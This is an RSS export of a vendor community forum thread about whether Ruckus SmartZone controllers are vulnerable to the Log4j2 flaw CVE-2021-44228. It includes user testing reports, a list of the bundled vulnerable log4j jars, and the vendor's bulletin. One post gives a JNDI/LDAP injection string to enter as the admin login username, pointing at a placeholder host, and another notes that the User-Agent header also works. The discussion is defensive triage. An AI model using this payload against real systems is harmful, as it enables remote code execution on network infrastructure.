<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:taxo="http://purl.org/rss/1.0/modules/taxonomy/" version="2.0">
  <channel>
    <title>topic Re: [CVE-2021-44228] Apache Log4j2 RCE in SmartZone and Virtual SmartZone</title>
    <link>https://community.ruckuswireless.com/t5/SmartZone-and-Virtual-SmartZone/CVE-2021-44228-Apache-Log4j2-RCE/m-p/38539#M3316</link>
    <description>&lt;P style="margin: 0;"&gt;Missing for me as well. I have a ticket that was already opened and updated the support ticket asking about the KB article.&amp;nbsp;&lt;/P&gt;</description>
    <pubDate>Fri, 17 Dec 2021 22:24:03 GMT</pubDate>
    <dc:creator>JTakaMT</dc:creator>
    <dc:date>2021-12-17T22:24:03Z</dc:date>
    <item>
      <title>[CVE-2021-44228] Apache Log4j2 RCE</title>
      <link>https://community.ruckuswireless.com/t5/SmartZone-and-Virtual-SmartZone/CVE-2021-44228-Apache-Log4j2-RCE/m-p/38482#M3259</link>
      <description>&lt;P style="margin: 0;"&gt;Hello.&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;Our customer is running a Ruckus SmartZone (sz-100) controller.&lt;BR /&gt;The version of the controller is 5.1.1.0.598.&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;&lt;BR /&gt;The customer asked if the SmartZone has the following this security vulnerabilities.&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;** Vulnerability: [CVE-2021-44228] Apache Log4j2 RCE&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;Thank you for your valuable answers to the above questions.&lt;/P&gt;</description>
      <pubDate>Mon, 13 Dec 2021 01:51:16 GMT</pubDate>
      <guid>https://community.ruckuswireless.com/t5/SmartZone-and-Virtual-SmartZone/CVE-2021-44228-Apache-Log4j2-RCE/m-p/38482#M3259</guid>
      <dc:creator>dawoon_lee</dc:creator>
      <dc:date>2021-12-13T01:51:16Z</dc:date>
    </item>
    <item>
      <title>Re: [CVE-2021-44228] Apache Log4j2 RCE</title>
      <link>https://community.ruckuswireless.com/t5/SmartZone-and-Virtual-SmartZone/CVE-2021-44228-Apache-Log4j2-RCE/m-p/38483#M3260</link>
      <description>&lt;P style="margin: 0;"&gt;Hello &lt;A href="https://forums.ruckuswireless.com/users/5f9169f949d3ca752488ed3f" style=""&gt;@dawoon_lee&lt;/A&gt;&amp;nbsp;&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;This vulnerability is really new and our Engineering has been notified about this issue to check if this vulnerability is affecting us and how we can mitigate the effects. We do understood this is a critical situation and we will update you with the information from our internal team. Below is our link where we will soon add our response.&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;&lt;A href="https://support.ruckuswireless.com/security" target="_blank" rel="noopener noopener noreferrer"&gt;https://support.ruckuswireless.com/security&lt;/A&gt;&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;Best Regards&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;Vineet&lt;/P&gt;</description>
      <pubDate>Mon, 13 Dec 2021 03:30:16 GMT</pubDate>
      <guid>https://community.ruckuswireless.com/t5/SmartZone-and-Virtual-SmartZone/CVE-2021-44228-Apache-Log4j2-RCE/m-p/38483#M3260</guid>
      <dc:creator>Vineet_nejwala</dc:creator>
      <dc:date>2021-12-13T03:30:16Z</dc:date>
    </item>
    <item>
      <title>Re: [CVE-2021-44228] Apache Log4j2 RCE</title>
      <link>https://community.ruckuswireless.com/t5/SmartZone-and-Virtual-SmartZone/CVE-2021-44228-Apache-Log4j2-RCE/m-p/38484#M3261</link>
      <description>&lt;P style="margin: 0;"&gt;Hi Vineet. I have an open case 01288986 asking engineering about the same question&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;Ai can't believe I was the first on to open such case, but they way the ticket is being dealt with seems as if there is no coordinated effort. We're past 72 hours after the initial discovery and I would have expected at an absolute minimum an announcement on the website or mailing list.&amp;nbsp;&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;Also, at least a basic set of responses such as product x is using /not using log4j version y with jdk / jre version Z. At an absolute minimum, some basic communication.&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;My very first tests dont seem to indicate that the system is exploitable... (Referring to SZ 5.2.1) but these were basic fuzzing tests.&amp;nbsp;&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;&lt;/P&gt;</description>
      <pubDate>Mon, 13 Dec 2021 04:40:23 GMT</pubDate>
      <guid>https://community.ruckuswireless.com/t5/SmartZone-and-Virtual-SmartZone/CVE-2021-44228-Apache-Log4j2-RCE/m-p/38484#M3261</guid>
      <dc:creator>diego_garcia_de</dc:creator>
      <dc:date>2021-12-13T04:40:23Z</dc:date>
    </item>
    <item>
      <title>Re: [CVE-2021-44228] Apache Log4j2 RCE</title>
      <link>https://community.ruckuswireless.com/t5/SmartZone-and-Virtual-SmartZone/CVE-2021-44228-Apache-Log4j2-RCE/m-p/38485#M3262</link>
      <description>&lt;P&gt;&lt;A href="https://forums.ruckuswireless.com/users/5f9169ed49d3ca752488a88e" style=""&gt;@diego_garcia_del_rio&lt;/A&gt;&lt;/P&gt; 
&lt;P&gt;&lt;/P&gt; 
&lt;P&gt;We are sorry for the delay but I see the TSE assisting you has also raised same concern with engineering and awaiting their response. I would update asap once we have a response from our engineering.&lt;/P&gt; 
&lt;P&gt;&lt;/P&gt; 
&lt;P&gt;Best Regards&lt;/P&gt; 
&lt;P&gt;Vineet&lt;/P&gt; 
&lt;P&gt;&lt;/P&gt; 
&lt;P&gt;&amp;nbsp;&lt;/P&gt;</description>
      <pubDate>Mon, 13 Dec 2021 05:19:25 GMT</pubDate>
      <guid>https://community.ruckuswireless.com/t5/SmartZone-and-Virtual-SmartZone/CVE-2021-44228-Apache-Log4j2-RCE/m-p/38485#M3262</guid>
      <dc:creator>Vineet_nejwala</dc:creator>
      <dc:date>2021-12-13T05:19:25Z</dc:date>
    </item>
    <item>
      <title>Re: [CVE-2021-44228] Apache Log4j2 RCE</title>
      <link>https://community.ruckuswireless.com/t5/SmartZone-and-Virtual-SmartZone/CVE-2021-44228-Apache-Log4j2-RCE/m-p/38486#M3263</link>
      <description>&lt;P&gt;&lt;A href="https://forums.ruckuswireless.com/users/5f9169eb49d3ca7524889df4" style=""&gt;@vineet_nejawala&lt;/A&gt;&amp;nbsp;&lt;/P&gt; 
&lt;P&gt;I look forward to your sincere reply.&lt;BR /&gt;Thank you.&lt;/P&gt;</description>
      <pubDate>Mon, 13 Dec 2021 08:08:51 GMT</pubDate>
      <guid>https://community.ruckuswireless.com/t5/SmartZone-and-Virtual-SmartZone/CVE-2021-44228-Apache-Log4j2-RCE/m-p/38486#M3263</guid>
      <dc:creator>dawoon_lee</dc:creator>
      <dc:date>2021-12-13T08:08:51Z</dc:date>
    </item>
    <item>
      <title>Re: [CVE-2021-44228] Apache Log4j2 RCE</title>
      <link>https://community.ruckuswireless.com/t5/SmartZone-and-Virtual-SmartZone/CVE-2021-44228-Apache-Log4j2-RCE/m-p/38487#M3264</link>
      <description>&lt;P style="margin: 0;"&gt;I tested this myself on the weekend. Our virtual smartzone is affected.&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;Logging in to the Admin page by using a username:&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;${jndi:ldap://a.b.c.d:6666/a}&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;(replace a.b.c.d with a ip which is reachable by the controller)&amp;nbsp;&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;will send out a request to this ip in a request for possible malware. I have shutdown my controller on the weekend.&lt;/P&gt;</description>
      <pubDate>Mon, 13 Dec 2021 08:26:54 GMT</pubDate>
      <guid>https://community.ruckuswireless.com/t5/SmartZone-and-Virtual-SmartZone/CVE-2021-44228-Apache-Log4j2-RCE/m-p/38487#M3264</guid>
      <dc:creator>torge_szczepane</dc:creator>
      <dc:date>2021-12-13T08:26:54Z</dc:date>
    </item>
    <item>
      <title>Re: [CVE-2021-44228] Apache Log4j2 RCE</title>
      <link>https://community.ruckuswireless.com/t5/SmartZone-and-Virtual-SmartZone/CVE-2021-44228-Apache-Log4j2-RCE/m-p/38488#M3265</link>
      <description>&lt;P style="margin: 0;"&gt;Filesystem content of VSZ Image:&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;./opt/ruckuswireless/wsg/apps/lib/log4j-1.2.13.jar&lt;BR /&gt;./opt/ruckuswireless/wsg/apps/lib/log4j-over-slf4j-1.6.1.jar&lt;BR /&gt;./opt/ruckuswireless/wsg/apps/lib/log4j-over-slf4j-1.6.6.jar&lt;BR /&gt;./opt/ruckuswireless/wsg/apps/lib/log4j-1.2.17.jar&lt;BR /&gt;./opt/ruckuswireless/wsg/apps/lib/log4j-slf4j-impl-2.8.2.jar&lt;BR /&gt;./opt/ruckuswireless/wsg/apps/lib/log4j-jcl-2.8.2.jar&lt;BR /&gt;./opt/ruckuswireless/wsg/apps/lib/log4j-web-2.8.2.jar&lt;BR /&gt;./opt/ruckuswireless/wsg/apps/lib/log4j-api-2.11.1.jar&lt;BR /&gt;./opt/ruckuswireless/wsg/apps/lib/log4j-to-slf4j-2.11.1.jar&lt;BR /&gt;./opt/ruckuswireless/wsg/apps/lib/log4j-core-2.8.2.jar&lt;BR /&gt;./opt/ruckuswireless/wsg/apps/lib/log4j-core-2.11.1.jar&lt;BR /&gt;./opt/ruckuswireless/wsg/apps/lib/slf4j-log4j12-1.7.5.jar&lt;BR /&gt;./opt/ruckuswireless/wsg/apps/lib/log4j-over-slf4j-1.7.25.jar&lt;BR /&gt;./opt/ruckuswireless/wsg/apps/lib/log4j-1.2.16.jar&lt;BR /&gt;./opt/ruckuswireless/wsg/apps/lib/log4j-api-2.8.2.jar&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;...&lt;/P&gt;</description>
      <pubDate>Mon, 13 Dec 2021 08:43:59 GMT</pubDate>
      <guid>https://community.ruckuswireless.com/t5/SmartZone-and-Virtual-SmartZone/CVE-2021-44228-Apache-Log4j2-RCE/m-p/38488#M3265</guid>
      <dc:creator>torge_szczepane</dc:creator>
      <dc:date>2021-12-13T08:43:59Z</dc:date>
    </item>
    <item>
      <title>Re: [CVE-2021-44228] Apache Log4j2 RCE</title>
      <link>https://community.ruckuswireless.com/t5/SmartZone-and-Virtual-SmartZone/CVE-2021-44228-Apache-Log4j2-RCE/m-p/38489#M3266</link>
      <description>&lt;P&gt;&lt;A href="https://forums.ruckuswireless.com/users/61b703cdaea01e415fed6bd5"&gt;@torge_szczepanek&lt;/A&gt;&amp;nbsp;&lt;/P&gt; 
&lt;P&gt;&lt;/P&gt; 
&lt;P&gt;Does the above also affect smartzone? (not virtual)&lt;/P&gt;</description>
      <pubDate>Mon, 13 Dec 2021 08:59:39 GMT</pubDate>
      <guid>https://community.ruckuswireless.com/t5/SmartZone-and-Virtual-SmartZone/CVE-2021-44228-Apache-Log4j2-RCE/m-p/38489#M3266</guid>
      <dc:creator>dawoon_lee</dc:creator>
      <dc:date>2021-12-13T08:59:39Z</dc:date>
    </item>
    <item>
      <title>Re: [CVE-2021-44228] Apache Log4j2 RCE</title>
      <link>https://community.ruckuswireless.com/t5/SmartZone-and-Virtual-SmartZone/CVE-2021-44228-Apache-Log4j2-RCE/m-p/38490#M3267</link>
      <description>&lt;P style="margin: 0;"&gt;My guess would be, that this is the same software just as a appliance. But this is just a guess. We do not have Smartzone devices.&lt;/P&gt;</description>
      <pubDate>Mon, 13 Dec 2021 09:29:52 GMT</pubDate>
      <guid>https://community.ruckuswireless.com/t5/SmartZone-and-Virtual-SmartZone/CVE-2021-44228-Apache-Log4j2-RCE/m-p/38490#M3267</guid>
      <dc:creator>torge_szczepane</dc:creator>
      <dc:date>2021-12-13T09:29:52Z</dc:date>
    </item>
    <item>
      <title>Re: [CVE-2021-44228] Apache Log4j2 RCE</title>
      <link>https://community.ruckuswireless.com/t5/SmartZone-and-Virtual-SmartZone/CVE-2021-44228-Apache-Log4j2-RCE/m-p/38491#M3268</link>
      <description>&lt;P style="margin: 0;"&gt;@torge_szczepanek - good spot!&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;Br,&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;Mark.&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;&lt;/P&gt;</description>
      <pubDate>Mon, 13 Dec 2021 12:23:29 GMT</pubDate>
      <guid>https://community.ruckuswireless.com/t5/SmartZone-and-Virtual-SmartZone/CVE-2021-44228-Apache-Log4j2-RCE/m-p/38491#M3268</guid>
      <dc:creator>mark_pledl</dc:creator>
      <dc:date>2021-12-13T12:23:29Z</dc:date>
    </item>
    <item>
      <title>Re: [CVE-2021-44228] Apache Log4j2 RCE</title>
      <link>https://community.ruckuswireless.com/t5/SmartZone-and-Virtual-SmartZone/CVE-2021-44228-Apache-Log4j2-RCE/m-p/38492#M3269</link>
      <description>&lt;P style="margin: 0;"&gt;Has Ruckus put out a public statement on this?&amp;nbsp; I can't seem to find anything on their website for it.&amp;nbsp; Can/Should we be shutting down our virtual VSze servers to protect systems?&lt;/P&gt; 
&lt;P style="margin: 0;"&gt;&lt;/P&gt;</description>
      <pubDate>Mon, 13 Dec 2021 13:48:59 GMT</pubDate>
      <guid>https://community.ruckuswireless.com/t5/SmartZone-and-Virtual-SmartZone/CVE-2021-44228-Apache-Log4j2-RCE/m-p/38492#M3269</guid>
      <dc:creator>tom_lebel</dc:creator>
      <dc:date>2021-12-13T13:48:59Z</dc:date>
    </item>
    <item>
      <title>Re: [CVE-2021-44228] Apache Log4j2 RCE</title>
      <link>https://community.ruckuswireless.com/t5/SmartZone-and-Virtual-SmartZone/CVE-2021-44228-Apache-Log4j2-RCE/m-p/38493#M3270</link>
      <description>&lt;P&gt;Hi &lt;A href="https://forums.ruckuswireless.com/users/5f9169c572a09d07dea84bd4"&gt;@tom_lebel&lt;/A&gt;&lt;/P&gt; 
&lt;P&gt;We are expecting a response soon on this. &lt;I&gt;Commscope is aware of the latest Vulnerability CVE-2021-44228. Our engineering team is currently performing the appropriate assessment on all our product lines&lt;/I&gt; &lt;I&gt;. This is the highest priority for us and we will update our security bulletin as soon as more information is available on the same. Here is the link to our security bulletin which will be updated soon:&amp;nbsp;&lt;A href="https://support.ruckuswireless.com/security" target="_blank" rel="noopener noreferrer"&gt;https://support.ruckuswireless.com/security&lt;/A&gt;&lt;/I&gt;&amp;nbsp;&lt;/P&gt; 
&lt;P&gt;&lt;/P&gt; 
&lt;P&gt;Best Regards&lt;/P&gt; 
&lt;P&gt;Vineet&lt;/P&gt;</description>
      <pubDate>Mon, 13 Dec 2021 13:52:22 GMT</pubDate>
      <guid>https://community.ruckuswireless.com/t5/SmartZone-and-Virtual-SmartZone/CVE-2021-44228-Apache-Log4j2-RCE/m-p/38493#M3270</guid>
      <dc:creator>Vineet_nejwala</dc:creator>
      <dc:date>2021-12-13T13:52:22Z</dc:date>
    </item>
    <item>
      <title>Re: [CVE-2021-44228] Apache Log4j2 RCE</title>
      <link>https://community.ruckuswireless.com/t5/SmartZone-and-Virtual-SmartZone/CVE-2021-44228-Apache-Log4j2-RCE/m-p/38494#M3271</link>
      <description>&lt;P&gt;&lt;A href="https://forums.ruckuswireless.com/users/5f9169c572a09d07dea84bd4" style=""&gt;@tom_lebel&lt;/A&gt; -&amp;nbsp; there is no public statement. I am no Ruckus employee.&lt;/P&gt; 
&lt;P&gt;Can you please make a ticket to Ruckus - they will update you with information. I don't want to hand out any details without their permission.&lt;/P&gt; 
&lt;P&gt;&lt;/P&gt; 
&lt;P&gt;Hope you understand!&lt;/P&gt; 
&lt;P&gt;&lt;/P&gt; 
&lt;P&gt;Br,&lt;/P&gt; 
&lt;P&gt;&lt;/P&gt; 
&lt;P&gt;Mark.&lt;/P&gt;</description>
      <pubDate>Mon, 13 Dec 2021 13:59:06 GMT</pubDate>
      <guid>https://community.ruckuswireless.com/t5/SmartZone-and-Virtual-SmartZone/CVE-2021-44228-Apache-Log4j2-RCE/m-p/38494#M3271</guid>
      <dc:creator>mark_pledl</dc:creator>
      <dc:date>2021-12-13T13:59:06Z</dc:date>
    </item>
    <item>
      <title>Re: [CVE-2021-44228] Apache Log4j2 RCE</title>
      <link>https://community.ruckuswireless.com/t5/SmartZone-and-Virtual-SmartZone/CVE-2021-44228-Apache-Log4j2-RCE/m-p/38495#M3272</link>
      <description>&lt;P&gt;&lt;A href="https://forums.ruckuswireless.com/users/61b703cdaea01e415fed6bd5" style=""&gt;@torge_szczepanek&lt;/A&gt; Thanks.. indeed those are alll the vulnerable packages.&lt;/P&gt; 
&lt;P&gt;&lt;/P&gt; 
&lt;P&gt;I need to do one more test with a "hosting" server to see if the&amp;nbsp; ldap response actually gets executed (I've been looking at this issue in details for other products and, depending on the java JRE security configuration, it migth refuse to download and execute code).&lt;/P&gt; 
&lt;P&gt;&lt;/P&gt; 
&lt;P&gt;Another thing I've notices is that, at least for the username, it seems to truncate it but the user-agent header can also be used as an exploit it would seems&lt;/P&gt; 
&lt;P&gt;&lt;/P&gt; 
&lt;P&gt;I still need to check if any downloaded code is actually executed.&lt;/P&gt;</description>
      <pubDate>Mon, 13 Dec 2021 14:10:38 GMT</pubDate>
      <guid>https://community.ruckuswireless.com/t5/SmartZone-and-Virtual-SmartZone/CVE-2021-44228-Apache-Log4j2-RCE/m-p/38495#M3272</guid>
      <dc:creator>diego_garcia_de</dc:creator>
      <dc:date>2021-12-13T14:10:38Z</dc:date>
    </item>
    <item>
      <title>Re: [CVE-2021-44228] Apache Log4j2 RCE</title>
      <link>https://community.ruckuswireless.com/t5/SmartZone-and-Virtual-SmartZone/CVE-2021-44228-Apache-Log4j2-RCE/m-p/38496#M3273</link>
      <description>&lt;P style="margin: 0;"&gt;Thanks for responding Vineet. We are looking forward to a Security Bulletin/Announcement update from the Ruckus team soon.&amp;nbsp;&lt;/P&gt;</description>
      <pubDate>Mon, 13 Dec 2021 16:15:34 GMT</pubDate>
      <guid>https://community.ruckuswireless.com/t5/SmartZone-and-Virtual-SmartZone/CVE-2021-44228-Apache-Log4j2-RCE/m-p/38496#M3273</guid>
      <dc:creator>JTakaMT</dc:creator>
      <dc:date>2021-12-13T16:15:34Z</dc:date>
    </item>
    <item>
      <title>Re: [CVE-2021-44228] Apache Log4j2 RCE</title>
      <link>https://community.ruckuswireless.com/t5/SmartZone-and-Virtual-SmartZone/CVE-2021-44228-Apache-Log4j2-RCE/m-p/38497#M3274</link>
      <description>&lt;P&gt;&lt;A href="https://forums.ruckuswireless.com/users/5f9169eb49d3ca752488a174" style=""&gt;@michael_thompson_e3bsvnhy1spi9&lt;/A&gt;&lt;/P&gt; 
&lt;P&gt;&lt;/P&gt; 
&lt;P&gt;Thank you. The bulletin would be updated soon, so far we have been confirmed that code 3.6.2 is safe from this vulnerability and further is being tested.&lt;/P&gt; 
&lt;P&gt;&lt;/P&gt; 
&lt;P&gt;Best Regards&lt;/P&gt; 
&lt;P&gt;Vineet&amp;nbsp;&lt;/P&gt;</description>
      <pubDate>Mon, 13 Dec 2021 16:32:18 GMT</pubDate>
      <guid>https://community.ruckuswireless.com/t5/SmartZone-and-Virtual-SmartZone/CVE-2021-44228-Apache-Log4j2-RCE/m-p/38497#M3274</guid>
      <dc:creator>Vineet_nejwala</dc:creator>
      <dc:date>2021-12-13T16:32:18Z</dc:date>
    </item>
    <item>
      <title>Re: [CVE-2021-44228] Apache Log4j2 RCE</title>
      <link>https://community.ruckuswireless.com/t5/SmartZone-and-Virtual-SmartZone/CVE-2021-44228-Apache-Log4j2-RCE/m-p/38498#M3275</link>
      <description>&lt;P style="margin: 0;"&gt;The RUCKUS Security Bulletin addressing Log4j is now published at &lt;A href="https://support.ruckuswireless.com/security_bulletins/313" target="_blank" rel="noopener"&gt;https://support.ruckuswireless.com/security_bulletins/313&lt;/A&gt;&lt;/P&gt;
&lt;P style="margin: 0;"&gt;&lt;/P&gt;
&lt;P style="margin: 0;"&gt;Allan.&lt;/P&gt;</description>
      <pubDate>Mon, 13 Dec 2021 23:27:28 GMT</pubDate>
      <guid>https://community.ruckuswireless.com/t5/SmartZone-and-Virtual-SmartZone/CVE-2021-44228-Apache-Log4j2-RCE/m-p/38498#M3275</guid>
      <dc:creator>grodog-prod</dc:creator>
      <dc:date>2021-12-13T23:27:28Z</dc:date>
    </item>
    <item>
      <title>Re: [CVE-2021-44228] Apache Log4j2 RCE</title>
      <link>https://community.ruckuswireless.com/t5/SmartZone-and-Virtual-SmartZone/CVE-2021-44228-Apache-Log4j2-RCE/m-p/38499#M3276</link>
      <description>&lt;P&gt;&lt;A href="https://forums.ruckuswireless.com/users/5f9169f949d3ca752488ed3f" style=""&gt;@dawoon_lee &lt;/A&gt;&lt;/P&gt; 
&lt;P&gt;&lt;A href="https://forums.ruckuswireless.com/users/5f9169eb49d3ca752488a174" style=""&gt;@michael_thompson_e3bsvnhy1spi9&lt;/A&gt;&amp;nbsp;&lt;/P&gt; 
&lt;P&gt;&lt;A href="https://forums.ruckuswireless.com/users/5f9169ed49d3ca752488a88e" style=""&gt;@diego_garcia_del_rio&lt;/A&gt;&amp;nbsp;&lt;/P&gt; 
&lt;P&gt;&lt;A href="https://forums.ruckuswireless.com/users/5f9169c572a09d07dea84bd4" style=""&gt;@tom_lebel&lt;/A&gt;&amp;nbsp;&lt;/P&gt; 
&lt;P&gt;&lt;/P&gt; 
&lt;P&gt;Please find our official response and next action:&lt;/P&gt; 
&lt;P&gt;&lt;/P&gt; 
&lt;P&gt;&lt;A href="https://support.ruckuswireless.com/security_bulletins/313" target="_blank" rel="noopener noopener noreferrer"&gt;https://support.ruckuswireless.com/security_bulletins/313&lt;/A&gt;&lt;/P&gt; 
&lt;P&gt;&lt;/P&gt; 
&lt;P&gt;Best Regards&lt;/P&gt; 
&lt;P&gt;Vineet&amp;nbsp;&lt;/P&gt;</description>
      <pubDate>Tue, 14 Dec 2021 01:47:33 GMT</pubDate>
      <guid>https://community.ruckuswireless.com/t5/SmartZone-and-Virtual-SmartZone/CVE-2021-44228-Apache-Log4j2-RCE/m-p/38499#M3276</guid>
      <dc:creator>Vineet_nejwala</dc:creator>
      <dc:date>2021-12-14T01:47:33Z</dc:date>
    </item>
    <item>
      <title>Re: [CVE-2021-44228] Apache Log4j2 RCE</title>
      <link>https://community.ruckuswireless.com/t5/SmartZone-and-Virtual-SmartZone/CVE-2021-44228-Apache-Log4j2-RCE/m-p/38500#M3277</link>
      <description>&lt;P&gt;&lt;A href="https://forums.ruckuswireless.com/users/5f9169f249d3ca752488c5cc" style=""&gt;@allan_grohe&lt;/A&gt;&amp;nbsp;hi Allan&amp;nbsp;&lt;/P&gt; 
&lt;P&gt;&lt;/P&gt; 
&lt;P&gt;The advisory seems to be only available in text format (and not pdf) and ALL text advisories return an error and do not load. Other vulns have a pdf version and we can access that but the text version just errors out&lt;/P&gt; 
&lt;P&gt;&lt;/P&gt; 
&lt;P&gt;Also, given the criticality of the incident it would be good for the advisory to be available without a support account.&amp;nbsp;&lt;/P&gt; 
&lt;P&gt;&lt;/P&gt; 
&lt;P&gt;&lt;/P&gt;</description>
      <pubDate>Tue, 14 Dec 2021 02:03:40 GMT</pubDate>
      <guid>https://community.ruckuswireless.com/t5/SmartZone-and-Virtual-SmartZone/CVE-2021-44228-Apache-Log4j2-RCE/m-p/38500#M3277</guid>
      <dc:creator>diego_garcia_de</dc:creator>
      <dc:date>2021-12-14T02:03:40Z</dc:date>
    </item>
    <item>
      <title>Re: [CVE-2021-44228] Apache Log4j2 RCE</title>
      <link>https://community.ruckuswireless.com/t5/SmartZone-and-Virtual-SmartZone/CVE-2021-44228-Apache-Log4j2-RCE/m-p/38501#M3278</link>
      <description>&lt;P&gt;&lt;A href="https://forums.ruckuswireless.com/users/5f9169ed49d3ca752488a88e"&gt;@diego_garcia_del_rio&lt;/A&gt;&lt;/P&gt;
&lt;P&gt;The text format is working well and we are working on pdf part too, meanwhile please find below content from our official response :&lt;/P&gt;
&lt;P&gt;&lt;/P&gt;
&lt;P style="margin: 0;"&gt;What is the issue?&lt;BR /&gt;A vulnerability was found in the Apache Log4j logging library from version 2.0 to 2.14.1. Products utilizing this library are susceptible to remote code execution vulnerability, where a remote attacker can leverage this vulnerability to gain full control of the impacted device.&lt;BR /&gt;For more details about this vulnerability, please see &lt;A href="https://nvd.nist.gov/vuln/detail/CVE-2021-44228" rel="noopener noopener noreferrer" target="_blank"&gt;https://nvd.nist.gov/vuln/detail/CVE-2021-44228&lt;/A&gt;.&lt;/P&gt;
&lt;P style="margin: 0;"&gt;&lt;/P&gt;
&lt;P style="margin: 0;"&gt;What action should I take?&lt;BR /&gt;RUCKUS is releasing the fix for these vulnerability through a software update. Since it is a critical issue, all affected customers are strongly encouraged to apply the fix once available.&lt;/P&gt;
&lt;P style="margin: 0;"&gt;In case of any questions contact RUCKUS TAC through regular means as described at &lt;A href="https://support.ruckuswireless.com/contact-us" target="test_blank"&gt;https://support.ruckuswireless.com/contact-us&lt;/A&gt; and refer to this document to validate this entitlement.&lt;/P&gt;
&lt;P style="margin: 0;"&gt;&lt;/P&gt;
&lt;P style="margin: 0;"&gt;Are there any workarounds available?&amp;nbsp;&lt;BR /&gt;No&lt;/P&gt;
&lt;P style="margin: 0;"&gt;&lt;/P&gt;
&lt;P style="margin: 0;"&gt;What is the impact on Ruckus products?&lt;/P&gt;
&lt;P style="margin: 0;"&gt;&lt;BR /&gt;The following products are not vulnerable: All Access Points, ZoneDirector, Unleashed, ICX Switches, SPoT/vSPoT, and RUCKUS Cloud.&lt;/P&gt;
&lt;P style="margin: 0;"&gt;&lt;/P&gt;
&lt;P style="margin: 0;"&gt;The following products are under assessment: Cloudpath, IoT, MobileApps, RUCKUS Analytics, and SCI.&lt;/P&gt;
&lt;P style="margin: 0;"&gt;&lt;/P&gt;
&lt;P style="margin: 0;"&gt;The following table describes the vulnerable products, software versions, and the recommended actions.&lt;/P&gt;
&lt;P style="margin: 0;"&gt;&lt;/P&gt;
&lt;DIV style="text-align: center;"&gt;
&lt;span class="lia-inline-image-display-wrapper" image-alt="Image_ images_messages_61b7feacd8944f34de6777be_ca39dcaf8ec8cf25e460c2da89a9fa75_advisory-8a4f2ed5-41b1-46f0-bda1-30bfad40e5df-522996908.PNG"&gt;&lt;img src="https://community.ruckuswireless.com/t5/image/serverpage/image-id/2463iB16766E2CB410F27/image-size/large?v=v2&amp;amp;px=999" role="button" title="Image_ images_messages_61b7feacd8944f34de6777be_ca39dcaf8ec8cf25e460c2da89a9fa75_advisory-8a4f2ed5-41b1-46f0-bda1-30bfad40e5df-522996908.PNG" alt="Image_ images_messages_61b7feacd8944f34de6777be_ca39dcaf8ec8cf25e460c2da89a9fa75_advisory-8a4f2ed5-41b1-46f0-bda1-30bfad40e5df-522996908.PNG" /&gt;&lt;/span&gt;
&lt;/DIV&gt;
&lt;DIV style="text-align: center;"&gt;&lt;/DIV&gt;
&lt;DIV style="text-align: center;"&gt;&lt;/DIV&gt;</description>
      <pubDate>Tue, 14 Dec 2021 02:17:16 GMT</pubDate>
      <guid>https://community.ruckuswireless.com/t5/SmartZone-and-Virtual-SmartZone/CVE-2021-44228-Apache-Log4j2-RCE/m-p/38501#M3278</guid>
      <dc:creator>Vineet_nejwala</dc:creator>
      <dc:date>2021-12-14T02:17:16Z</dc:date>
    </item>
  </channel>
</rss>

